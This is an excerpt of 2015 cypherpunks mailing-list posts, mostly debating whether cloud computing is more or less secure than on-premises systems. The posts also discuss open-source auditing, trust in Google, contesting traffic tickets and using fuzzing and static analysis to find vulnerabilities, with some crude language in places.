References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal>
Message-ID:

On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote:
> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote:
>
>> On 7/16/15 7:51 AM, Georgi Guninski wrote:
>> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote:
>> >> In a lot of ways, this is an elegant solution and could arguably be
>> >> much more secure than desktop apps in Windows. Assuming your
>> > Lol, is this positive or negative argument?
>> >
>> > it can hardly be less secure than windoze imho.
>> >
>> Cypherpunks + Windows, what do you think?
>
> It's making me break out in hives, stop it! :p
>
> *shudder*

The bazillion lines of effectively unaudited code in opensource kernels and software should have the same effect upon you.

From grarpamp at gmail.com Thu Jul 16 12:12:24 2015
From: grarpamp at gmail.com (grarpamp)
Date: Thu, 16 Jul 2015 15:12:24 -0400
Subject: an ominous comment
In-Reply-To: <55A7E9B4.6030307@lig.net>
References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net>
Message-ID:

On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote:
> At some point
> I realized that I should just go to court for every ticket or other
> opportunity. If the alternative is that you certainly have to pay, then you
> might as well learn, get comfortable protecting yourself in court, say your
> peace, and try whatever legal argument you can think of. I have about a 50%
> win rate.

Few people realize how easy it is to push 50% on tickets even if all they do is plead not guilty and wait for the cop not to show up. And that's before feigning/posturing that you actually have a case thereby driving your own bargain. Prosecutors hate risk. You making a case in front of a judge is a risk they'll bend over backwards to avoid. Find their weak spots, play to win, go for the dismissals, prepare for the not guilty battles, punk the state, have fun with it :) After all, it is your right. And entire forums exist to help you do it.

From grarpamp at gmail.com Thu Jul 16 12:29:47 2015
From: grarpamp at gmail.com (grarpamp)
Date: Thu, 16 Jul 2015 15:29:47 -0400
Subject: an ominous comment
In-Reply-To: <55A7E73F.6070507@lig.net>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A7E73F.6070507@lig.net>
Message-ID:

Trying to support cloud with argument of better tech is one thing. However tech doesn't really counter the arguments John makes. Echoing them...

"Cloud" is every bit as much suspect in those various regards. Foisted upon ignorant IT management who bathe themselves in the Kool-Aid and false prospect of liability offloading. Pre positioned by IT job and education system requiring "certifications" funneling football jocks into IT instead of natural talent for sysadmin. Supported by rent seeking and constant churn of failed contracts into new contracts... locked up, tied down, paid to change and held hostage until freed. Insulated by mandatory contractual disclaimers to privacy, hacking and negligence. Perpetualized by the continual offering of dependency teat for suckage. Huge disjoint between interests. Your key to your door does not fit theirs. Extrafunded by datamining and exploited by all manner of "partners" on the backside.

It's also interesting to see insurers popping up around IT risk. Yes, insurance can add needed diligence and rigor. But it also indicates an industry finally throwing its hands up and saying "Ok, we've hit the limit of reasonably attainable security".

Good sysadmins/coders are worth their weight in gold. And even if only as advisors, you want them working directly for you, not on the other side of some cloud contract.

Yes, the first "cloud" models were in fact an entire corporate HQ full of thin client xterms [today: browsers] connected to the datacenter down the hall. Analysts and admins might say that how [new] tech and resources are utilized is the factor, not where it's housed.

Cloud is utilising and making good offers in particular use cases, because it's free to speculate on its own VC dime. But there are tangible caveats and risks there that don't always equate to a dire need to scrap what you already have down the hall. Look before you leap.

From guninski at guninski.com Thu Jul 16 07:51:42 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Thu, 16 Jul 2015 17:51:42 +0300
Subject: an ominous comment
In-Reply-To: <55A540A7.6080808@lig.net>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net>
Message-ID: <20150716145142.GA2610@sivokote.iziade.m$>

On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote:
> In a lot of ways, this is an elegant solution and could arguably be
> much more secure than desktop apps in Windows. Assuming your

Lol, is this positive or negative argument?

it can hardly be less secure than windoze imho.

From list at sysfu.com Thu Jul 16 19:21:00 2015
From: list at sysfu.com (Seth)
Date: Thu, 16 Jul 2015 19:21:00 -0700
Subject: The Too Much Information Age
Message-ID:

http://abstrusegoose.com/553

-------------- next part --------------
A non-text attachment was scrubbed...
Name: TMIA.png
Type: image/png
Size: 201214 bytes
Desc: not available
URL:

From l at odewijk.nl Thu Jul 16 08:39:17 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Fri, 17 Jul 2015 00:39:17 +0900
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net>
Message-ID:

2015-07-15 2:20 GMT+09:00 Kurt Buff :

> On Tue, Jul 14, 2015 at 10:02 AM, Stephen D. Williams wrote:
> > Everything will be run in the cloud and browser because it is, overall, a
> > better computation model.
>
> Certainly that's the current bias, but web browser as platform isn't
> really all that it's cracked up to be, IMHO - all browsers suck, and I
> don't see them getting better any time soon, especially if they run
> javascript and plugins.
>

"All browsers suck"?.. They run HTML pretty darn well. I'd say HTML is a document language, not an application language, and now it's trying to be both and it's a pretty psychotic fit. But it still works pretty darn much better than anything else out there.

I'd like there to be an "all settled standards compliant fast and secure browser", but the secure is usually omitted (and there's a rush to support the not-quite-settled standards).

Not much wrong with JavaScript, but I hope they'll soon support several other languages too. Like perhaps LLVM's intermediary format - so we can compile whatever into a near-metal language that will run really fast. (and saving a lot of people the effort of writing/maintaining to-js compilers)

But the cloud is a better computational platform because of:
* Economies of scale for computer electronics, power, network connections
* Time sharing on the cloud's hardware
* Sometimes architecture advantages

But, pushing back, there's:
* Latency/bandwidth to user
* Loss of end user's control over essential hardware
* Massive trust and security issues

We're looking at the following:

- micropower devices; IoT and thinner smartphones (less power usage as batteries do not seem to develop fast), home automation panels, extra body-mounted-displays, in-car panels, home-appliance panels (refrigerator to mixer), televisions, alarm clocks, some tablets and laptops
  anything with power or financial constraints. These machines are that which the user interacts with. Their entire design gives way to human preference and comfort. They do not compute much, and might contain nothing but a video-stream-decoder and a "window manager" that decodes simple graphics statements (hopefully simpler than HTML).

- computers; workstations, desktop pc's, laptops, stand-alone "videocards" with generic computing support, servers, gaming-appliances
  fast computers that are positioned somewhere in the house. Low latency to the user and with very good price/performance relationships (desktops now are miracles). Given the single-core-ceiling these machines will typically fare better than ideal cloud setups for many applications. They can be rented out to remote users dynamically.

- remote processing; the cloud, the neighbors' computers, etc
  time-shared computing that is not in-house. Typically high latency, extremely high maximum power and lowest cost. Latency constraints force it to be used only for very expensive operations - such as rendering tasks and machine learning (for business intelligence or otherwise). If the set-up-time for such an operation is 2000ms many tasks are still better run locally - the application-support-system (OS?) will have to make choices about this rather fast.

> > However, that doesn't preclude you from running a
> > cloud locally.
>
> Certainly better than public/commercial clouds - at least until proven
> encryption becomes the norm.

What I've described above is a sort of multi-tier architecture. At the moment remote or local computing is a wild west with exclusively homebrewed solutions. At some point we will integrate all our devices, and software's locality will be managed better as well. Encryption will be applied automatically at the appropriate places.

I think the largest desired capability is the inaptly named "homomorphic encryption", which should be optimized and packaged such that heavy processing can be remotely executed in a safe and trustless manner.

What is to be done? Well, I hope we can avoid the situation where we run the browsers and they run the software. We're going there now because the architecture I mentioned does not exist - and because it's a simpler model. A business could be made out of making hardware that follows the above model, that would probably be the best way to make it happen. Elsewise we're all along for the ride that the unknowing public is buying us into.

From zen at freedbms.net Thu Jul 16 17:52:59 2015
From: zen at freedbms.net (Zenaan Harkness)
Date: Fri, 17 Jul 2015 00:52:59 +0000
Subject: an ominous comment
In-Reply-To: <55A567F3.1000006@m-o-o-t.org>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A567F3.1000006@m-o-o-t.org>
Message-ID:

On 7/14/15, Peter Fairbrother wrote:
> On 14/07/15 18:02, Stephen D. Williams wrote:
>> Everything will be run in the cloud and browser because it is, overall,
>> a better computation model.
>
> It is? Why?

Why? You ask WHY!??!!!

Pfft... pesky questions won't get you a short way...

From zen at freedbms.net Thu Jul 16 17:59:19 2015
From: zen at freedbms.net (Zenaan Harkness)
Date: Fri, 17 Jul 2015 00:59:19 +0000
Subject: an ominous comment
In-Reply-To: <20150716175450.2ECC6680133@frontend2.nyi.internal>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal>
Message-ID:

On 7/16/15, Shelley wrote:
> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote:
>
>> On 7/16/15 7:51 AM, Georgi Guninski wrote:
>> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote:
>> >> In a lot of ways, this is an elegant solution and could arguably be
>> >> much more secure than desktop apps in Windows. Assuming your
>> > Lol, is this positive or negative argument?
>> >
>> > it can hardly be less secure than windoze imho.
>> >
>> Cypherpunks + Windows, what do you think?
>>
>> sdw
>>
>
> It's making me break out in hives, stop it! :p
>
> *shudder*

Windows gives you wiiiings.

From zen at freedbms.net Thu Jul 16 18:13:45 2015
From: zen at freedbms.net (Zenaan Harkness)
Date: Fri, 17 Jul 2015 01:13:45 +0000
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net>
Message-ID:

On 7/16/15, grarpamp wrote:
> On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote:
>> At some point
>> I realized that I should just go to court for every ticket or other
>> opportunity. If the alternative is that you certainly have to pay, then
>> you
>> might as well learn, get comfortable protecting yourself in court, say
>> your
>> peace, and try whatever legal argument you can think of. I have about a
>> 50%
>> win rate.
>
> Few people realize how easy it is to push 50% on tickets even if
> all they do is plead not guilty and wait for the cop not to show up.
> And that's before feigning/posturing that you actually have a case
> thereby driving your own bargain. Prosecutors hate risk.
> You making a case in front of a judge is a risk they'll bend over
> backwards to avoid. Find their weak spots, play to win, go for the
> dismissals, prepare for the not guilty battles, punk the state,
> have fun with it :) After all, it is your right. And entire forums
> exist to help you do it.

One of the most significant benefits - learning to face one of your fears. Think you're tough, strong, emotionally balanced? Get up in front of a Magistrate and facing down the prosecutor, and see what your knees do then :)

Do that a few times, and start to feel awesome! Self esteem fast track...

From sdw at lig.net Fri Jul 17 07:21:57 2015
From: sdw at lig.net (Stephen D. Williams)
Date: Fri, 17 Jul 2015 07:21:57 -0700
Subject: an ominous comment
In-Reply-To: <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> <55A80723.5060405@lig.net> <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org>
Message-ID: <55A90F85.3040001@lig.net>

On 7/16/15 12:49 PM, alan at clueserver.org wrote:
>> On 7/16/15 11:44 AM, grarpamp wrote:
>>> On Thu, Jul 16, 2015 at 1:55 PM, Shelley
>>> wrote:
>>>> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote:
>>>>
>>>>> On 7/16/15 7:51 AM, Georgi Guninski wrote:
>>>>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote:
>>>>>>> In a lot of ways, this is an elegant solution and could arguably be
>>>>>>> much more secure than desktop apps in Windows. Assuming your
>>>>>> Lol, is this positive or negative argument?
>>>>>>
>>>>>> it can hardly be less secure than windoze imho.
>>>>> Cypherpunks + Windows, what do you think?
>>>> It's making me break out in hives, stop it! :p
>>>>
>>>> *shudder*
>>> The bazillion lines of effectively unaudited code in opensource
>>> kernels and software should have the same effect upon you.
>> I personally have audited quite a bit of FOSS (and enough spot checkers
>> can get pretty good coverage), but not one line of
>> proprietary Microsoft, Oracle, or Apple code. Your fears may be
>> misplaced.
> Large companies regularly scan their open source (and proprietary code)
> with Black Duck's ProtexIP software. That product shows if code is
> "borrowed" from other places. They also have open source tools that do
> similar things.
>
> The idea that open source is filled with stolen code is FUD.
>

"Stolen code" isn't really an issue most of the time, but can be legally if a lot is used in a way that conflicts with a license. Reusing code snippets is, to a large extent, not really a copyright issue and often fair use or use of something that isn't really protected by copyright. In any case, it is a legal issue separate from the security implications.

The FUD in question is whether there are security problems of some kind lurking in code, and whether it is easier to compromise a binary when you have source to start with. The flip side is that it is easier to hide back doors in code that has limited access to source code. Security mistakes, deliberate malware, and detection are possible in both cases, but in different ways, with different numbers of actual or potential people looking and with different likelihood of active positive or negative collusion.

sdw

From sdw at lig.net Fri Jul 17 07:23:39 2015
From: sdw at lig.net (Stephen D. Williams)
Date: Fri, 17 Jul 2015 07:23:39 -0700
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net>
Message-ID: <55A90FEB.4080204@lig.net>

On 7/16/15 6:13 PM, Zenaan Harkness wrote:
> On 7/16/15, grarpamp wrote:
>> On Thu, Jul 16, 2015 at 1:28 PM, Stephen D. Williams wrote:
>>> At some point
>>> I realized that I should just go to court for every ticket or other
>>> opportunity. If the alternative is that you certainly have to pay, then
>>> you
>>> might as well learn, get comfortable protecting yourself in court, say
>>> your
>>> peace, and try whatever legal argument you can think of. I have about a
>>> 50%
>>> win rate.
>> Few people realize how easy it is to push 50% on tickets even if
>> all they do is plead not guilty and wait for the cop not to show up.
>> And that's before feigning/posturing that you actually have a case
>> thereby driving your own bargain. Prosecutors hate risk.
>> You making a case in front of a judge is a risk they'll bend over
>> backwards to avoid. Find their weak spots, play to win, go for the
>> dismissals, prepare for the not guilty battles, punk the state,
>> have fun with it :) After all, it is your right. And entire forums
>> exist to help you do it.
> One of the most significant benefits - learning to face one of your
> fears. Think you're tough, strong, emotionally balanced? Get up in
> front of a Magistrate and facing down the prosecutor, and see what
> your knees do then :)
>
> Do that a few times, and start to feel awesome! Self esteem fast track...

Exactly.

sdw

From jya at pipeline.com Fri Jul 17 08:28:27 2015
From: jya at pipeline.com (John Young)
Date: Fri, 17 Jul 2015 11:28:27 -0400
Subject: an ominous comment
In-Reply-To: <55A90FEB.4080204@lig.net>
References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> <55A7E9B4.6030307@lig.net> <55A90FEB.4080204@lig.net>
Message-ID:

Exactly why judges masturbate with a noisy device, snooze, bark errant orders, abuse assistants, bailiffs, attorneys, juries, aggravate higher and lower judges, get shot, shoot back, get laid and STD in chambers.

Courtroom tedium (aka justice), procedural churning, empty bombast, strutting, feigning, farting, fingering anus itch, jury boredom, hollow pretense of respect for the law -- from this comes little new, and a lot of wasted time, so obese, privileged, endlessly disputatious precedent is valued over disruptive lean novelty and Roy Bean quick resolution, wherein fear of mortality and hard labor are suspended self-sentences, and issuing death penalties against childhood bullies absconding with therapy dolls is the dream of payback jurists in black cross dresses.

At 10:23 AM 7/17/2015, you wrote:
>Exactly.
>
>sdw

From guninski at guninski.com Fri Jul 17 07:55:35 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Fri, 17 Jul 2015 17:55:35 +0300
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal>
Message-ID: <20150717145534.GA2514@sivokote.iziade.m$>

On Fri, Jul 17, 2015 at 12:59:19AM +0000, Zenaan Harkness wrote:
> On 7/16/15, Shelley wrote:
> >
> > It's making me break out in hives, stop it! :p
> >
> > *shudder*
>
> Windows gives you wiiiings.

indeeeeeed, they caaaaaaan flyyyyyyy ;)

From sdw at lig.net Sat Jul 18 10:22:38 2015
From: sdw at lig.net (Stephen D. Williams)
Date: Sat, 18 Jul 2015 10:22:38 -0700
Subject: an ominous comment
In-Reply-To: <20150718151551.GA2439@sivokote.iziade.m$>
References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$>
Message-ID: <55AA8B5E.1040202@lig.net>

On 7/18/15 8:15 AM, Georgi Guninski wrote:
> On Sat, Jul 18, 2015 at 01:39:45PM +0200, Florian Weimer wrote:
>> Well, for one thing, it removes physical access to machines from
>> insiders on your end, and in many cases, also direct access to data,
>> particularly in its bulk form.
>>
>> With conscious effort and the right resources, you might be able to
>> come with better security controls than the large service providers,
>> but right now, most organizations don't have much of an audit trail
>> for locally run services. I'm not sure if moving data off premises
>> actually results in a net loss of control over it. Not because the
>> service providers are so good at security, but because various factors
>> conspire to make almost everyone else so bad.
> Well, I don't trust the cloud and don't use it.
> (I don't trust my boxen in a different way).
>
> The cloud owns the CPU and this is enough for me.
>
> You should be aware of the numerous virtualization
> sploits -- Xen, Qemu, possibly others.
>
> Exploiting a virtualization bug is just the fee
> "to be in cloud" and I _suspect_ more efforts
> are needed for my boxen.

Valid concerns in the abstract. In practice, the economic concerns of big cloud providers mean they must provide continually upgraded certainty of fundamental security separation. Part of that is randomness of where your code runs: If there are millions of VMs on hundreds of thousands of physical servers, even if there is a VM escape, it is essentially impractical for malware to target your instance. This could be enhanced by VM / container hopping in various senses. Working within the system is likely to provide you a stronger result than something cobbled together locally.

However, we need solutions for that too, with and without cloud technology. We need people who don't trust the cloud and keep developing better alternatives. I think some of those alternatives involve cloud technology locally, but that's not a big thing.

I have friends who are rabid Google haters / fearmongers, apparently based on the fact that it was the first company they were aware of that seemed to have access and responsibility for too much information, or too much of their information, or too strong an allure for their information.

I feel perfectly confident that Google is going to protect their billions in income and valuation by being very careful with avoiding abusing their data or users in any strong sense. That might not withstand a court order or national security letter or TLA hack monitoring unencrypted links, although big Silicon Valley companies recently have been getting tougher there. But it certainly means they aren't "reading my email" for prurient or invasive purposes that would be embarrassing to me: It would become embarrassing to them quickly and cost millions or billions.

sdw

From edenw at gal3.com Sat Jul 18 10:55:52 2015
From: edenw at gal3.com (eden)
Date: Sat, 18 Jul 2015 10:55:52 -0700
Subject: Encryption Rights - A Google+ community
In-Reply-To: <179659091.PKgjI4HLZx@lapuntu>
References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu>
Message-ID:

On Sat, Jul 18, 2015 at 10:07 AM, rysiek wrote:
> On Tuesday, 14 July 2015 02:45:39 Shelley wrote:
>> On July 14, 2015 2:11:35 AM stef wrote:
>> > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote:
>> > > https://plus.google.com/communities/109624826715876091211
>> > > Encryption Rights - Protecting Our Rights to Strongly Encrypt
>> > > By Lauren Weinstein
>> > > http://www.vortex.com/lauren
>> >
>> > but wtf in the middle of the kraakens tentacles? wth do people still trust
>> > google? even laura. wtf? the mind boggles.
>> >
>> I'm glad it's not just me! That was my reaction too but I held back from
>> commenting, because I feel like I'm always bitching here about cpunks or
>> anyone interested in privacy still using google for any reason. I don't
>> understand it.
>
> +1 here.

I'm an admin for a lot of groups. Those groups are run on Yahoo, Google, as well as some that are run on private mailman machines. The question keeps coming up... what is the alternative?

> Well, I understand the need for more "social" (for want of better word)
> communication platform than e-mail. For me, this is Twister:
> http://twister.net.co/

This looks very interesting. Thank you, I will have to look into it.

But, back to the question: How/where can someone run a simple (ignoring the sign-up required by Yahoo/Google/etc.), public, free (both ways, because paying would require identification) forum, allowing for anonymous posts (but not allowing it to be overrun by trolls), that has a simple searchable (and findable - as in searched by Google, Yahoo, etc.) archive?

You still have to trust a privately run forum. Trust, as in, will it be censored, altered, still there after the volunteer gets tired of it, etc.?

In other words, if you want a private discussion group about Privacy, then yes, keep it small and secret... somehow. But if you want a public discussion, what are the alternatives to Google/Yahoo/etc.?

-- eden

From sdw at lig.net Sat Jul 18 11:35:35 2015
From: sdw at lig.net (Stephen D. Williams)
Date: Sat, 18 Jul 2015 11:35:35 -0700
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net>
Message-ID: <55AA9C77.2020801@lig.net>

On 7/18/15 10:32 AM, Lodewijk andré de la porte wrote:
> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams >:
>
> I feel perfectly confident that Google is going to protect their billions in income and valuation by being very careful with
> avoiding abusing their data or users in any strong sense.
>
>
> I want to say "You're new here, aren't you?", but I know you're not. Parallel construction and intelligence laundering take care
> of this in case they want to abuse your data. Big Data is never very much of a privacy issue, but when they silently use that Big
> Data for their (or their companies') profit, well, without competition you'll lose. And then there's straight
> business-secret-stealing, which they also do, and which is very hard to ever find out about (parallel construction is also
> possible here).
>
> So, yeah, they'll protect their billions in income and valuation. And they'll use all the intelligence the US can bring to the
> table to do it.

Perfectly within the realm of the possible. A lone employee may be able to abuse things, but they likely will be caught, fired, and the incident has some chance of being righted and paid off. Unlikely to actually be the case in any pervasive way. Nearly all conspiracies leak eventually. Being a commercial company, they are a huge target for a jackpot payday. TLAs have no such worry, which is why when they do illegal things and otherwise drift or charge outside the boundaries that it is so bad.

A few years ago, before Congress stepped in to let them off the hook, phone companies like ATT were in a tight spot for allowing a lot of open access to customer data. I'm sure that legal departments everywhere took notice of that exposure; Congress isn't going to do that too many more times, and especially not for commercial gain.

Parallel construction is a big problem, although I think that it has been exposed in some major cases lately that should soften courts for detecting and confronting it. It's possible both for prosecutors, TLAs, and companies wanting to steal proprietary trade secrets. Perhaps practical and legal techniques used to combat insider trading may start to provide some protection. It is at least possible to take countermeasures to expose parallel construction: information that provides ways of detecting eavesdropping is an obvious solution.

It is certainly the case that we should consider the possible, especially since there have been a number of surprises about how far things actually did go in the past, especially the TLAs, but also sometimes with companies with really bad culture. But that red team gaming shouldn't spill over too much into our rational assessment of actual risks and reasonable countermeasures.

There is a typical problem I call the Fallacy of Insisting on Zero Risk: A mother fearing their children using the bathroom at the mall alone or calling the police because someone else's child walks to the park alone while thinking nothing of horse riding or football or rodeo or smoking. Or OSHA related spending millions per death to prevent one type of injury while ignoring other much lower hanging injury risks. Gun control, vaccines, playground equipment, etc. often involve similar elements.

When making actual concrete security choices, a rational actor considers the threat, opportunity, costs, rewards, exposure, overhead, etc. when weighing what measures are worth taking. In a presentation to the Nevada Gaming Commission years ago, I used the analogy of protecting nuclear weapons: The cost of a compromise is nearly infinite, so the amount you would be willing to rationally invest to prevent a compromise also can be nearly infinite. (But apparently not given recent events related to those crews.) Everything else falls in a lower tier where there is a cost / benefit tradeoff. You can go far enough in taking measures that you are worse off than if you had been compromised in the worst probable way. The question there was how much certainty was needed that an Internet gambler was of age.

We went through a similar thing related to porn: Early on, many jurisdictions insisted on absolute certainty that a remote viewer was of age, or a company-ending lawsuit or criminal case would result. Now, porn is essentially wide open, with at most proof of control of a credit card required to verify age; easily bypassed by a determined teenager, who could legally have a Visa debit card anyway. For one thing, most of the supposed damage (Meese report etc.) was bogus, so few controls are really called for.

Now, many of us here want to be able to protect ourselves and others out of principle, need, career, and/or interest. We may find it fun and career worthy to have TLA / scammer / evil genius defeating countermeasures and tradecraft. We may get to the point we actually need it, or work with clients who definitely do. But we shouldn't slip into unnecessary paranoia, especially if it gets to the point of shooting ourselves in the foot. When we're making an argument, we are often taking the paranoid view because that's required to get into the right mindset. After determining how to prevent issues, we should then decide what is actually worth putting into place.

I've run my own physical Internet server, including my own DNS servers, since 1992 when I obtained my first domain name and started a couple ISPs. For various reasons, I will continue to do that, but I'm not sure I'd recommend it to others, especially the non-technical. My uptime, currently at 267 days, is basically the lifetime of the hard drive or the rare case when the colo moves things around.

sdw

From hozer at hozed.org Sat Jul 18 10:22:57 2015
From: hozer at hozed.org (Troy Benjegerdes)
Date: Sat, 18 Jul 2015 12:22:57 -0500
Subject: [Cryptography] Super-computer project wanted
In-Reply-To: <55A6E2E2.7030101@gna.org>
References: <55A53867.4090100@sonic.net> <55A59E56.5020206@gna.org> <55A6E2E2.7030101@gna.org>
Message-ID: <20150718172257.GH27932@nl.grid.coop>

On Thu, Jul 16, 2015 at 10:46:58AM +1200, Christian Gagneraud wrote:
> On 15/07/15 11:42, Christian Gagneraud wrote:
> >On 15/07/15 08:44, grarpamp wrote:
> >>>>>dave at horsfall.org
> >>>>>So, is there anything that could benefit from a few parallel
> >>teraflops here and there?
> >>
> >>On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote:
> >>>Or you could apply static code analysis software to huge
> >>>masses of existing operating system, device driver, plugin,
> >>>email-client or god-help-us browser code in wide use and
> >>>see if you can't spot instances of dangerous vulnerabilities
> >>>like buffer overflows. A list of known errors would be
> >>>very helpful in getting code up to 'bulletproof' reliability
> >>>and no one runs ALL the possible static analysis we know
> >>>about on large bodies of code because it takes too long on
> >>>regular computers.
> >>
> >>This, and fuzzing... of all the opensource OS's and all the
> >>ported packages they supply. And dump all of github in it
> >>for fun.
> >
> >FYI, the AFL fuzzer already has an impressive trophy case:
> >See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/
>
> And here is a blog post about the future of the Linux Trinity
> fuzzer, used by Hacking Team to fuzz Android IOCTL.
>
> "I’m done enabling assholes."
>
> http://codemonkey.org.uk/2015/07/12/future-trinity/
>
>
> Chris
>
> >
> >>It takes too long, too much developer time, a different
> >>skillset, opensource test suites may not yet cover some
> >>areas that commercial ones do, etc.
> >>
> >>Ripe for development of an open perpetual audit project.
> >>
> >>That, and printing your own open and trusted chips, in your own
> >>open and trusted fab, are possible now. It's big picture, grand slam,
> >>full circle headiness, but it is doable. People just have to get
> >>together and kick it off.
> >>

I think the only way this is going to work is if there is a business model based on small, medium, and large scale business ecosystems selling open source hardware [1][2], and these businesses differentiate themselves by the amount and types of fuzzing they do on the whole damn system.
[1] http://search.proquest.com/openview/317778ee503bb0624c7b51c868833bd0/1?pq-origsite=gscholar
[2] http://gplspace.org/

From fw at deneb.enyo.de Sat Jul 18 04:39:45 2015
From: fw at deneb.enyo.de (Florian Weimer)
Date: Sat, 18 Jul 2015 13:39:45 +0200
Subject: an ominous comment
In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> (dan@geer.org's message of "Tue, 14 Jul 2015 11:52:03 -0400")
References: <20150714155203.826F52282E2@palinka.tinho.net>
Message-ID: <871tg5puda.fsf@mid.deneb.enyo.de>

> Discussing security policy post-OPM debacle in a setting to which
> I have access (sorry to be oblique), it was said by a CxO "We have
> to prepare for the day when no software we depend on is run on
> premises."

Well, for one thing, it removes physical access to machines from insiders on your end, and in many cases, also direct access to data, particularly in its bulk form.

With conscious effort and the right resources, you might be able to come up with better security controls than the large service providers, but right now, most organizations don't have much of an audit trail for locally run services. I'm not sure if moving data off premises actually results in a net loss of control over it. Not because the service providers are so good at security, but because various factors conspire to make almost everyone else so bad.

From juan.g71 at gmail.com Sat Jul 18 13:46:53 2015
From: juan.g71 at gmail.com (Juan)
Date: Sat, 18 Jul 2015 17:46:53 -0300
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net>
Message-ID: <55aabafb.0ae88c0a.425f.ffffdf77@mx.google.com>

On Sun, 19 Jul 2015 02:32:53 +0900 Lodewijk andré de la porte wrote:
> 2015-07-19 2:22 GMT+09:00 Stephen D.
Williams : > > > I feel perfectly confident that Google is going to protect their > > billions in income and valuation by being very careful with > > avoiding abusing their data or users in any strong sense. > > > I want to say "You're new here, aren't you?", but I know you're not. He isn't? Well, I guess then he's just yet another old and loyal apologist of the americunt establishment. Oh, yes google-NSA will 'protect' its 'customers' because of 'economic' reasons. Not to mention they are GOOD people because they say so. Hey, it's in their propaganda kits. And Yes, pseudo 'economics' talk can be widely misused to promote any kind of fascist agenda. > Parallel construction and intelligence laundering take care of this > in case they want to abuse your data. Big Data is never very much of > a privacy issue, but when they silently use that Big Data for their > (or their companies') profit, well, without competition you'll lose. > And then there's straight business-secret-stealing, which they also > do, and which is very hard to ever find out about (parallel > construction is also possible here). > > So, yeah, they'll protect their billions in income and valuation. > And > they'll use all the intelligence the US can bring to the table to do > it. From guninski at guninski.com Sat Jul 18 08:15:51 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 18 Jul 2015 18:15:51 +0300 Subject: an ominous comment In-Reply-To: <871tg5puda.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> Message-ID: <20150718151551.GA2439@sivokote.iziade.m$> On Sat, Jul 18, 2015 at 01:39:45PM +0200, Florian Weimer wrote: > Well, for one thing, it removes physical access to machines from > insiders on your end, and in many cases, also direct access to data, > particularly in its bulk form. 
>
> With conscious effort and the right resources, you might be able to
> come up with better security controls than the large service providers,
> but right now, most organizations don't have much of an audit trail
> for locally run services. I'm not sure if moving data off premises
> actually results in a net loss of control over it. Not because the
> service providers are so good at security, but because various factors
> conspire to make almost everyone else so bad.

Well, I don't trust the cloud and don't use it. (I don't trust my boxen in a different way). The cloud owns the CPU and this is enough for me.

You should be aware of the numerous virtualization sploits -- Xen, Qemu, possibly others.

Exploiting a virtualization bug is just the fee "to be in cloud" and I _suspect_ more efforts are needed for my boxen.

